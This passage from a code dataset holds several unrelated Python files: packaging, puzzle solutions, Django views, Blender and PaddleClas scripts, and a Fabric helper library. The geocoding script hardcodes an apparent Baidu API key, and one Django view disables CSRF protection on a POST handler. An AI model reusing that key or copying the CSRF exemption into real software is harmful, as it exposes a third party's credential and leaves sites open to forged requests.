xml.dom.minidom.parse(os.path.join(os.path.dirname(__file__), 'pom.xml'))\n_description = _valueFor('description', 'project', pomDoc)\n_url = _valueFor('url', 'project', pomDoc)\n_author = _valueFor('name', 'developer', pomDoc)\n_authorEmail = _valueFor('email', 'developer', pomDoc)\n\n# The version is no longer included in pom.xml, but in ../pom.xml. Although to be completely\n# Maven-subservient, we should look it up by the parent pom description. But screw that.\nparentPOM = os.path.join(os.path.dirname(__file__), '..', 'pom.xml')\nif os.path.isfile(parentPOM):\n pomDoc = xml.dom.minidom.parse(parentPOM)\n _version = _valueFor('version', 'project', pomDoc)\nelse:\n _version = '1.8.1'\n\n\n# Package data\n# ------------\n\n_name = 'pds.registry'\n_downloadURL = 'ftp://pds.nasa.gov/pub/toplevel/2010/registry/pds.registry-' + _version + '.tar.gz'\n_maintainer = 'Sean Kelly'\n_maintainerEmail = 'sean.kelly@jpl.nasa.gov'\n_license = 'Proprietary'\n_namespaces = ['pds', 'pds.registry']\n_zipSafe = True\n_keywords = 'ebxml registry information model client nasa pds'\n_testSuite = 'pds.registry.tests.test_suite'\n_entryPoints = {}\n_requirements = [\n 'setuptools',\n 'anyjson',\n]\n_testRequirements = [\n 'zope.testing',\n]\n_classifiers = [\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Science/Research',\n 'License :: Other/Proprietary License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'Topic :: Scientific/Engineering :: Atmospheric Science',\n 'Topic :: System :: Distributed Computing',\n]\n_ignoredModules = [\n 'bootstrap',\n 'setup',\n]\n\n# Setup Metadata\n# --------------\n\ndef _read(*rnames):\n return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\n\n_header = '*' * len(_name) + '\\n' + _name + '\\n' + '*' * len(_name)\n_longDescription = _header + '\\n\\n' + _read('README.txt') + '\\n\\n' + _read('docs', 'INSTALL.txt') + '\\n\\n' \\\n + _read('docs', 'HISTORY.txt') + '\\n\\n' + _read('docs', 'LICENSE.txt')\nopen('doc.txt', 'w').write(_longDescription)\n\nsetup(\n author=_author,\n author_email=_authorEmail,\n classifiers=_classifiers,\n description=_description,\n download_url=_downloadURL,\n entry_points=_entryPoints,\n extras_require={'test': _testRequirements},\n include_package_data=True,\n install_requires=_requirements,\n keywords=_keywords,\n license=_license,\n long_description=_longDescription,\n name=_name,\n namespace_packages=_namespaces,\n packages=find_packages('src'),\n package_dir={'': 'src'},\n test_suite=_testSuite,\n url=_url,\n version=_version,\n zip_safe=_zipSafe,\n)\n","repo_name":"NASA-PDS/planetarydata.org","sub_path":"src/pds.registry/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2347899897","text":"'''\n2022.10.3\n11866 - 요세푸스 문제 0\n'''\n\nfrom collections import deque\n\nN, K = map(int, input().split())\nnums = deque([])\nfor i in range(1, N+1):\n nums.append(i)\n\nprint('<', end='')\nwhile nums:\n for i in range(K-1):\n nums.append(nums[0])\n nums.popleft()\n print(nums.popleft(), end='')\n if nums:\n print(', ', end='')\nprint('>')\n\n","repo_name":"irenee-14/Python","sub_path":"class2/n11866.py","file_name":"n11866.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10255916165","text":"#coding:utf-8\n__author__ = \"ila\"\nimport requests\ndef geocoding(ak,lat, lon):\n lat_lon = '{},{}'.format(lat, lon)\n # address=str(i[0])+','+str(i[1])\n url = 'http://api.map.baidu.com/geocoder?output=json&key={}&location={}'.format(ak, str(lat_lon))\n r = requests.get(url)\n contents = r.json()\n print(contents)\n address = contents.get(\"result\").get(\"addressComponent\")\n # print(address)\n return address\n\nif __name__=='__main__':\n address=geocoding(\"QvMZVORsL7sGzPyTf5ZhawntyjiWYCif\",24.2943350100,116.1287866600)\n print(address)","repo_name":"shuangyulin/python023_lvyou","sub_path":"djangomg217/util/locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"27040566517","text":"from vendedor.forms import AdminForm\nfrom django.http.response import JsonResponse,HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render \nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom vendedor.models import *\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\ndef admin_list(request):\n context = {\n 'title':'Lista de vendedores',\n 'categories' : Vendedor.objects.all()\n }\n return render(request, 'admin/list.html',context)\n\nclass AdminListView(ListView):\n model = Vendedor\n template_name = 'admin/list.html'\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n \n def post(self, request, *args, **kwargs):\n data = {}\n try:\n data = Vendedor.objects.get(pk=request.POST['id']).toJSON()\n\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Lista de vendedores'\n context['create_url'] = reverse_lazy('admini:AdminCreateView')\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['entity'] = 'venta'\n return context\n\nclass AdminCreateView(CreateView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/create.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Registrar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['action'] = 'add'\n return context\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'add':\n form = self.get_form()\n data = form.save()\n else:\n data['error'] = 'no ha ingresado ninguna opcion'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\"\"\" def post(self, request, *args, **kwargs):\n print(request.POST)\n form = AdminForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(self.success_url)\n self.object = None\n context = self.get_context_data( **kwargs)\n context['form']= form\n return render(request, self.template_name, context)\n\"\"\"\n\nclass AdminUpdateView(UpdateView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/create.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'edit':\n form = self.get_form()\n data = form.save()\n else:\n data['error'] = 'no ha ingresado ninguna opcion'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n #print(self.object)\n #print(self.get_object())\n context = super().get_context_data(**kwargs)\n context['title'] = 'Editar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['action'] = 'edit'\n return context\n\nclass AdminDeleteView(DeleteView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/delete.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n #@method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n print(request.POST)\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n #print(self.object)\n #print(self.get_object())\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n return context","repo_name":"arthurFRC396/Proyecto2---AS","sub_path":"AGUAMARINA/app/vendedor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39610288307","text":"with open(\"input.txt\", 'r') as f:\n directions = f.readline()\n\norientation = [\"N\", \"E\", \"S\", \"W\"]\n\nstart_x, start_y = 0, 0\n\nx, y = start_x, start_y\n\ndx = {\"N\": 0, \"E\": 1, \"S\": 0, \"W\": -1}\ndy = {\"N\": 1, \"E\": 0, \"S\": -1, \"W\": 0}\n\ndirections = directions.split(\" \")\n\nvisited = {}\n\nvisited_twice = []\n\nfor direction in directions:\n \n direction = direction.strip(\",\")\n\n if direction[0] == \"L\":\n orientation = orientation[-1:] + orientation[:-1]\n elif direction[0] == \"R\":\n orientation = orientation[1:] + orientation[:1]\n \n for _ in range(int(direction[1:])):\n x += dx[orientation[0]] \n y += dy[orientation[0]]\n \n located = str(x) + ',' + str(y)\n\n if located in visited.keys():\n visited_twice.append(located)\n else:\n visited[located] = None\n \na, b = visited_twice[0].split(\",\") \n \nprint(\"Part One:\", abs(int(x)-start_x) + abs(int(y)-start_y))\nprint(\"Part Two:\", abs(int(a)-start_x) + abs(int(b)-start_y))","repo_name":"jareddrayton/Advent-of-Code","sub_path":"advent_of_code_2016/day-01/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24812711210","text":"class Solution:\n def validUtf8(self, data: List[int]) -> bool:\n # Can do string manipulation and solve easily\n # Can save space and use bit manipulation instead\n \n # Initialize variables\n n_bytes = 0\n \n # This mask is used to check the second to left most bit in following bytes because they need\n # to be 0. So this with AND should result in 0.\n mask2 = 1 << 6\n \n for num in data:\n # This mask used for left most value\n mask = 1 << 7\n \n # So if we're dealing with the first byte in the sequence\n if n_bytes == 0:\n # While the mask returns 1 (aka the value we're checking is 1) or less than 5 bytes\n while mask & num and n_bytes < 5:\n # Increase n_bytes\n n_bytes += 1\n # Shift mask to right by 1.\n mask = mask >> 1\n \n # If we're dealing with a 1 byte char\n if n_bytes == 0:\n continue\n \n # If invalid (invalid if one counted or more than 4 bytes. One byte starts with 0, not 1)\n if n_bytes == 1 or n_bytes > 4:\n return False\n \n # Otherwise, we're dealing with a byte that isn't the first in the sequence\n else:\n # Just need to check if two leftmost bits == 10\n # If not, it's not valid\n if not (num & mask and not (num & mask2)):\n return False\n \n n_bytes -= 1\n \n # Outside the for loop, we need to make sure no bytes are left. \n return n_bytes == 0","repo_name":"PigsGoMoo/LeetCode","sub_path":"utf-8-validation/utf-8-validation.py","file_name":"utf-8-validation.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7159642772","text":"import sqlite3\r\n\r\ncx = sqlite3.connect(\"db.sqlite3\")\r\ncu=cx.cursor()\r\n\r\n# cu.execute(\"SELECT * FROM sensor_temperature\")\r\n# print(cu.fetchall())\r\n\r\n# cu.execute(\"DROP TABLE sensor_temperature\")\r\n\r\n# cu.execute(\"CREATE TABLE sensor_temperature(captime varchar(20),captemperature varchar(10))\")\r\n# cu.execute(\"CREATE TABLE sensor_temperature(id int PRIMARY KEY NOT NULL, captime varchar(20),captemperature varchar(10))\")\r\n\r\n\r\n# cu.execute(\"SELECT * FROM sensor_sensors\")\r\n# print(cu.fetchall())\r\n\r\n# cu.execute('DELETE FROM sensor_sensors WHERE id>50')\r\n# print(1)\r\ncu.execute(\"SELECT * FROM sensor_sensors where id=782\")\r\nprint(cu.fetchall())\r\n\r\n","repo_name":"ylf2002/sensor_display","sub_path":"sensordisplayProject/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6698288866","text":"import sys\nimport bpy\nimport random\nimport os\nimport string\nimport time\n\nsys.path.append('.')\n\nfrom transformations import transform\nfrom camera import change_resolution, bounding_box, change_focal_length\nfrom objOps import delete, copy\nfrom utils import init, progress\nfrom hdri import change_HDRI\nfrom data import images_per_class, save_dir, hdris_dir, filename_size, prob_many_objs, prob_add_obj\nfrom ground import adjust_ground\nfrom color import shift_color\n\ndef random_filename():\n \"\"\"\n Genrate a random string \n \"\"\"\n letters = string.ascii_lowercase + string.ascii_uppercase\n name = ''.join(random.choice(letters) for _ in range(filename_size))\n return f'{save_dir}/{name}'\n\ndef intersersct(obj1,obj2):\n \"\"\"\n Check if two obejct intersect from the camera view perspective\n \"\"\"\n # Boundingbox the objects\n o1p1, o1p2 = bounding_box(obj1)\n o2p1, o2p2 = bounding_box(obj2)\n return o1p1[0] < o2p2[0] and o1p2[0] > o2p1[0] and o1p1[1] < o2p2[1] and o1p2[1] > o2p1[1] \n\ndef choose_objs(collection):\n \"\"\"\n collection: main collection to use\n\n Choose an object mesh from a collection \n returns a list of chosed obejcts and a list of collctions names that have been used\n \"\"\"\n # add the principal collection to be used\n collections_names = [collection.name]\n\n # Chooose a mesh from collection\n render_objs = [random.choice(collection.all_objects).name]\n # Add others collections with randomly with probabily of prob_many_objs\n if random.random() < prob_many_objs:\n for i in collections:\n # Choose collection with probabliy of prob_add_obj\n if random.random() < prob_add_obj:\n # Choose a random object mesh from the random collection selected\n render_objs.append(random.choice(i.all_objects).name)\n # Add the collection selectd\n collections_names.append(i.name)\n return render_objs, collections_names\n\ndef use_collection(collection):\n \"\"\"\n collection: main collection to be used for the new render image\n \"\"\"\n # Random resolution\n change_resolution()\n # Random zoom\n change_focal_length()\n # Adjust the ground to cameras view\n adjust_ground()\n # Choose the objects ot be render\n possible_objs, possible_collections = choose_objs(collection)\n objects = []\n materials = []\n collections = []\n # Set a random hdri image\n img = change_HDRI(random.choice(hdris))\n for i, coll in zip(possible_objs, possible_collections):\n # Copy the current object, so won't be altred for next renders\n obj_copy = copy(i)\n # Set the object to be visible\n obj_copy.hide_render = False\n # make random transformations\n transform(obj_copy)\n # Change the color of the materials in the object mesh \n materials += shift_color(obj_copy, bpy.context.scene.objects[i].users_collection[0].name) \n b = True\n # Try 10 times to randomly acomodate the object mesh inside the view of the camera with no intersections\n attempts = 10\n for j in range(attempts):\n # check the object dosen't intersect with others from camera's perspective\n for o in objects:\n b = b and not intersersct(o, obj_copy)\n # If there is no intersection append the object\n if b:\n collections.append(coll)\n objects.append(obj_copy)\n break\n # If the object intersects with others make another random trasnfomation\n # Unless its the try 9, then the object can not be fitted\n elif j != (attempts -1):\n # set the copied object mesh the original data like loation, rotation, scale\n obj_copy.data = bpy.context.scene.objects[i].data.copy()\n # ranodm transfomration\n transform(obj_copy)\n b = True\n # If the object was not placed delete it\n if not b:\n delete(obj_copy)\n # Render and save the coordenates\n save(objects, collections)\n # Dispose copied objects \n for obj in objects:\n obj.hide_render = True\n delete(obj)\n # Remove hdri image\n bpy.data.images.remove(img)\n # Dispose copied materials\n for material in materials:\n bpy.data.materials.remove(material)\n\ndef save(objs, colls):\n \"\"\" \n objs: Array with the blender object meshes used\n colls: Array with the collection's names used\n\n Save a new render image and a txt file with the coordenates (YOLO)\n of the objects contained in the image \n \"\"\"\n # Random file name\n filename = random_filename()\n # Ensure the file name dosen't exist already\n while os.path.exists(f'{filename}.jpg'):\n filename = random_filename()\n # Set the path for saving the render image\n bpy.context.scene.render.filepath = f'{filename}'\n # Save the txt file with the coordenates of the image\n with open (f'{filename}.txt', 'w') as f:\n ln = len(objs)\n for i in range(len(objs)):\n # Get the bouding box of the objects in YOLO formtat\n x, y, w, h = bounding_box(objs[i], True)\n f.write(f'{names[colls[i]]} {x} {y} {w} {h}')\n if i != ln - 1 :\n f.write('\\n') \n # Render the image\n bpy.ops.render.render(write_still = True)\n\n\ndef main(n):\n for i in collections:\n for _ in range(n):\n start_time = time.time()\n use_collection(i)\n total_time = time.time() - start_time\n with open('algtimes.txt', 'a') as f:\n f.write(f'{total_time}\\n')\n progress(i.name)\n\nif __name__ == '__main__':\n startTime = time.time()\n hdris = [os.path.join(hdris_dir, i) for i in os.listdir(hdris_dir)]\n collections = bpy.data.collections['Objects'].children\n names = init(collections, save_dir)\n main(images_per_class)\n totalTime = time.time() - startTime \n print('Total time:', totalTime)","repo_name":"rogerramosruiz/synthetic-dataset-blender-hdri","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"43022354245","text":"\n# coding: utf-8\n\n# 1. use reg expressions to just get the nums - capture groups. specificying character ranges. char class for white space. sometimes no num just a period\n# 2. find a way to parse thru nums. find new and old vals.\n# 3. find way deal w multi old vals\n# 4. print things that dont match to inspect\n\n# In[19]:\n\ninfile = [\n'replace rocc60 = 41 if rocc70 == 103',\n'hello ',\n'replace rocc60 = 42 if rocc70 == 112',\n'',\n'replace rocc60 = 43 if rocc70 == 113',\n'',\n'replace rocc60 = 45 if rocc70 == 110',\n'',\n'replace rocc60 = 50 if rocc70 == 114',\n'',\n'replace rocc60 = 52 if rocc70 == 134',\n'',\n'replace rocc60 = 53 if rocc70 == 120 | rocc70 == 121 | rocc70 == 122 | rocc70 == 125 | rocc70 == 126 ',\n'',\n'replace rocc60 = 54 if rocc70 == 115 | rocc70 == 130 | rocc70 == 131 | rocc70 == 132 | rocc70 == 133',\n'',\n'replace rocc60 = 60 if rocc70 == 135 | rocc70 == 140',\n'',\n'replace rocc60 = 70 if rocc70 == 182',\n\n]\n\n\n# In[51]:\n\nimport re\nimport pandas as pd\n\npat = re.compile(r\"\\s([0-9.]+)\")\n\nmappings = [] #list of tuples of whole content in file\n#mappings.append((new_val,(old_vals), (firstnum, secondnums), (fistnum, secondnums))\n\n#with open(\"name.txt\") as infile:\nfor line in infile:\n \n if line.startswith(\"replace rocc\"):\n list_of_all_nums = pat.findall(line) # gets all numbers\n new_val = list_of_all_nums[0] # new number\n #old_vals = [] # list of all or the one old values \n \n for num in list_of_all_nums[1:]:\n key_val_pair = (num, new_val) ## \n mappings.append(key_val_pair)\n \n else:\n if line:\n print(line)\n \n# make a pandas data frame\ndf = pd.DataFrame(data = mappings, columns=['old val', 'new val' ])\ndf\n\n\n# In[ ]:\n#%%\nprint('hello')\n\n#%%\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"kaitlynson/SDL-lab-research","sub_path":"research/df for new old numsvals rocc60.py","file_name":"df for new old numsvals rocc60.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23445136805","text":"import os\nimport argparse\nimport time\nfrom functools import reduce\n\nimport yaml\nimport ast\nimport numpy as np\nimport cv2\nimport paddle\n\nfrom paddleclas.deploy.utils import logger, config\nfrom paddleclas.deploy.utils.predictor import Predictor\nfrom paddleclas.deploy.utils.get_image_list import get_image_list\nfrom paddleclas.deploy.python.preprocess import create_operators\nfrom paddleclas.deploy.python.det_preprocess import det_preprocess\n\n\nclass DetPredictor(Predictor):\n def __init__(self, config):\n super().__init__(config[\"Global\"],\n config[\"Global\"][\"det_inference_model_dir\"])\n\n self.preprocess_ops = create_operators(config[\"DetPreProcess\"][\n \"transform_ops\"])\n self.config = config\n\n def preprocess(self, img):\n im_info = {\n 'scale_factor': np.array(\n [1., 1.], dtype=np.float32),\n 'im_shape': np.array(\n img.shape[:2], dtype=np.float32),\n 'input_shape': self.config[\"Global\"][\"image_shape\"],\n \"scale_factor\": np.array(\n [1., 1.], dtype=np.float32)\n }\n im, im_info = det_preprocess(img, im_info, self.preprocess_ops)\n inputs = self.create_inputs(im, im_info)\n return inputs\n\n def create_inputs(self, im, im_info):\n \"\"\"generate input for different model type\n Args:\n im (np.ndarray): image (np.ndarray)\n im_info (dict): info of image\n model_arch (str): model type\n Returns:\n inputs (dict): input of model\n \"\"\"\n inputs = {}\n inputs['image'] = np.array((im, )).astype('float32')\n inputs['im_shape'] = np.array(\n (im_info['im_shape'], )).astype('float32')\n inputs['scale_factor'] = np.array(\n (im_info['scale_factor'], )).astype('float32')\n\n return inputs\n\n def parse_det_results(self, pred, threshold, label_list):\n max_det_results = self.config[\"Global\"][\"max_det_results\"]\n keep_indexes = pred[:, 1].argsort()[::-1][:max_det_results]\n results = []\n for idx in keep_indexes:\n single_res = pred[idx]\n class_id = int(single_res[0])\n score = single_res[1]\n bbox = single_res[2:]\n if score < threshold:\n continue\n label_name = label_list[class_id]\n results.append({\n \"class_id\": class_id,\n \"score\": score,\n \"bbox\": bbox,\n \"label_name\": label_name,\n })\n return results\n\n def predict(self, image, threshold=0.5, run_benchmark=False):\n '''\n Args:\n image (str/np.ndarray): path of image/ np.ndarray read by cv2\n threshold (float): threshold of predicted box' score\n Returns:\n results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box,\n matix element:[class, score, x_min, y_min, x_max, y_max]\n MaskRCNN's results include 'masks': np.ndarray:\n shape: [N, im_h, im_w]\n '''\n inputs = self.preprocess(image)\n np_boxes = None\n input_names = self.predictor.get_input_names()\n\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n\n t1 = time.time()\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n t2 = time.time()\n\n print(\"Inference: {} ms per batch image\".format((t2 - t1) * 1000.0))\n\n # do not perform postprocess in benchmark mode\n results = []\n if reduce(lambda x, y: x * y, np_boxes.shape) < 6:\n print('[WARNNING] No object detected.')\n else:\n results = self.parse_det_results(\n np_boxes, self.config[\"Global\"][\"threshold\"],\n self.config[\"Global\"][\"label_list\"])\n return results\n\n\ndef main(config):\n det_predictor = DetPredictor(config)\n image_list = get_image_list(config[\"Global\"][\"infer_imgs\"])\n\n assert config[\"Global\"][\"batch_size\"] == 1\n for idx, image_file in enumerate(image_list):\n img = cv2.imread(image_file)[:, :, ::-1]\n output = det_predictor.predict(img)\n print(output)\n\n return\n\n\nif __name__ == \"__main__\":\n args = config.parse_args()\n config = config.get_config(args.config, overrides=args.override, show=True)\n main(config)\n","repo_name":"PaddlePaddle/PaddleClas","sub_path":"deploy/python/predict_det.py","file_name":"predict_det.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":5081,"dataset":"github-code","pt":"3"} +{"seq_id":"25065095076","text":"# 1228\nfrom collections import Counter\n\n\nclass Solution:\n def missingNumber(self, arr):\n # base case - all elements of the array are the same, diff is 0\n if len(set(arr)) == 1:\n return arr[0] \n\n # array length is 3:\n if len(arr) == 3:\n #find if this is increasing or dec:\n incr = True if arr[1] > arr[0] else False\n a, b = arr[1] - arr[0], arr[2] - arr[1]\n if incr:\n return min(arr[:2]) + min([a, b])\n else:\n return max(arr[:2]) + max([a, b])\n\n\n\n D = dict()\n A = [None] * (len(arr) -1)\n for i in range(len(arr)-1):\n diff = arr[i+1] - arr[i]\n A[i] = diff\n if diff in D:\n D[diff] += 1\n else:\n D[diff] = 1\n\n for a, b in D.items():\n if b == 1:\n j = A.index(a)\n elif b > 1:\n other_a = a\n\n # new_arr = arr[:j+1] + [arr[j] + other_a] + arr[j+1:]\n new_arr = arr[j] + other_a\n return new_arr\n\n\nL = [5, 7, 11, 13]\nS = Solution()\nx = S.missingNumber(L)\nprint(x)\n","repo_name":"jkfer/LeetCode","sub_path":"Missing_num_in_arithm_progress.py","file_name":"Missing_num_in_arithm_progress.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14694954168","text":"import importlib\nimport os\nimport datetime\nimport glob\n\nimport sphinx\nfrom babel.dates import format_date\nfrom unipath import Path\n\nfrom atelier.utils import i2d\nfrom atelier import rstgen\n\ntry:\n from fabric.api import env, local, task\n from fabric.utils import abort, puts\n from fabric.contrib.console import confirm\n from fabric.api import lcd\nexcept ImportError:\n def task(**kwargs):\n def d(f):\n return f\n return d\n # ignore it here so that Sphinx autodoc can import it even\n # if fabric is not installed.\n\n\ndef get_current_date(today=None):\n \"\"\"\n \"\"\"\n\n if today is None:\n return datetime.date.today()\n return i2d(today)\n\n\nclass RstFile(object):\n\n def __init__(self, local_root, url_root, parts):\n self.path = local_root.child(*parts) + '.rst'\n self.url = url_root + \"/\" + \"/\".join(parts) + '.html'\n # if parts[0] == 'docs':\n # self.url = url_root + \"/\" + \"/\".join(parts[1:]) + '.html'\n # else:\n # raise Exception(\"20131125\")\n # self.url = url_root + \"/\" + \"/\".join(parts) + '.html'\n\n\ndef add_demo_project(p):\n \"\"\"Register the specified settings module as being a Django demo project.\n See also :attr:`env.demo_projects`.\n\n \"\"\"\n if p in env.demo_projects:\n return\n # raise Exception(\"Duplicate entry %r in demo_projects.\" % db)\n env.demo_projects.append(p)\n\n\ndef setup_from_fabfile(\n globals_dict, main_package=None, settings_module_name=None):\n \"\"\"To be called from within your project's :xfile:`fabfile.py`.\n\n Minimal example::\n\n from atelier.fablib import *\n setup_from_fabfile(globals())\n\n If this doctree is the main doctree of a Python project, then the\n minimal example should be::\n\n from atelier.fablib import *\n setup_from_fabfile(globals(), \"foobar\")\n\n Where \"foobar\" is the Python name of your project's main package.\n\n \"\"\"\n if not '__file__' in globals_dict:\n raise Exception(\n \"No '__file__' in %r. \"\n \"First parameter to must be `globals()`\" % globals_dict)\n \n fabfile = Path(globals_dict['__file__'])\n if not fabfile.exists():\n raise Exception(\"No such file: %s\" % fabfile)\n env.root_dir = fabfile.parent.absolute()\n # print(\"20141027 %s %s \" % (main_package, env.root_dir))\n\n env.project_name = env.root_dir.name\n env.setdefault('build_dir_name', '.build') # but ablog needs '_build'\n \n env.setdefault('long_date_format', \"%Y%m%d (%A, %d %B %Y)\")\n # env.work_root = Path(env.work_root)\n env.setdefault('use_dirhtml', False)\n env.setdefault('blog_root', env.root_dir.child('docs'))\n\n env.setdefault('sdist_dir', None)\n env.setdefault('editor_command', None)\n if env.sdist_dir is not None:\n env.sdist_dir = Path(env.sdist_dir)\n env.main_package = main_package\n env.locale_dir = None\n env.tolerate_sphinx_warnings = False\n env.demo_projects = []\n env.revision_control_system = None\n env.apidoc_exclude_pathnames = []\n # env.blogger_url = \"http://blog.example.com/\"\n\n env.setdefault('languages', None)\n env.setdefault('blogger_project', None)\n env.setdefault('blogger_url', None)\n env.setdefault('cleanable_files', [])\n\n if isinstance(env.languages, basestring):\n env.languages = env.languages.split()\n\n # if env.main_package:\n # env.SETUP_INFO = get_setup_info(Path(env.root_dir))\n # else:\n # env.SETUP_INFO = None\n\n if settings_module_name is not None:\n os.environ['DJANGO_SETTINGS_MODULE'] = settings_module_name\n from django.conf import settings\n # why was this? settings.SITE.startup()\n env.languages = [lng.name for lng in settings.SITE.languages]\n # env.demo_databases.append(settings_module_name)\n #~ env.userdocs_base_language = settings.SITE.languages[0].name\n\n # The following import will populate the projects\n from atelier.projects import get_project_info\n env.current_project = get_project_info(env.root_dir)\n\n env.doc_trees = env.current_project.doc_trees\n\n # env.SETUP_INFO = env.current_project.SETUP_INFO\n\n\nsetup_from_project = setup_from_fabfile # backwards compat\n\n\n#~ def confirm(msg,default='y',others='n',**override_callbacks):\n #~ text = \"%s [%s%s]\" % (msg,default.upper(),others)\n #~ def y(): return True\n # ~ # def n(): abort(\"Missing user confirmation for:\\n%s\" % msg)\n #~ def n(): abort(\"Missing user confirmation\")\n #~ callbacks = dict(y=y,n=n)\n #~ callbacks.update(override_callbacks)\n #~ while True:\n #~ answer = prompt(text)\n # ~ # answer = raw_input(prompt)\n #~ if not answer:\n #~ answer = default\n #~ answer = answer.lower()\n #~ if answer:\n #~ return callbacks.get(answer)()\ndef must_confirm(*args, **kw):\n if not confirm(*args, **kw):\n abort(\"Dann eben nicht...\")\n\n\ndef must_exist(p):\n if not p.exists():\n abort(\"No such file: %s\" % p.absolute())\n\n\ndef rmtree_after_confirm(p):\n if not p.exists():\n return\n if confirm(\"OK to remove %s and everything under it?\" % p.absolute()):\n p.rmtree()\n\n\ndef unused_get_locale_dir():\n # replaced by env.locale_dir\n if not env.main_package:\n return None # abort(\"No main_package\")\n args = env.main_package.split('.')\n args.append('locale')\n p = env.root_dir.child(*args)\n if not p.isdir():\n return None # abort(\"Directory %s does not exist.\" % p)\n return p\n\n\ndef cleanup_pyc(p):\n \"\"\"Thanks to oddthinking on http://stackoverflow.com/questions/2528283\n \"\"\"\n for root, dirs, files in os.walk(p):\n pyc_files = [filename for filename in files if filename.endswith(\".pyc\")]\n py_files = set([filename for filename in files if filename.endswith(\".py\")])\n excess_pyc_files = [pyc_filename for pyc_filename in pyc_files if pyc_filename[:-1] not in py_files]\n for excess_pyc_file in excess_pyc_files:\n full_path = os.path.join(root, excess_pyc_file)\n must_confirm(\"Remove excess file %s:\" % full_path)\n os.remove(full_path)\n\n\n@task(alias='unused_mm')\ndef make_messages():\n \"Extract messages, then initialize and update all catalogs.\"\n extract_messages()\n init_catalog_code()\n update_catalog_code()\n\n if False:\n extract_messages_userdocs()\n setup_babel_userdocs('init_catalog')\n setup_babel_userdocs('update_catalog')\n\n\ndef extract_messages():\n \"\"\"Extract messages from source files to `django.pot` file\"\"\"\n # locale_dir = get_locale_dir()\n locale_dir = env.locale_dir\n if locale_dir is None:\n return\n args = [\"python\", \"setup.py\"]\n args += [\"extract_messages\"]\n args += [\"-o\", Path(locale_dir).child(\"django.pot\")]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\ndef extract_messages_userdocs():\n \"\"\"\n Run the Sphinx gettext builder on userdocs.\n \"\"\"\n userdocs = env.root_dir.child('userdocs')\n 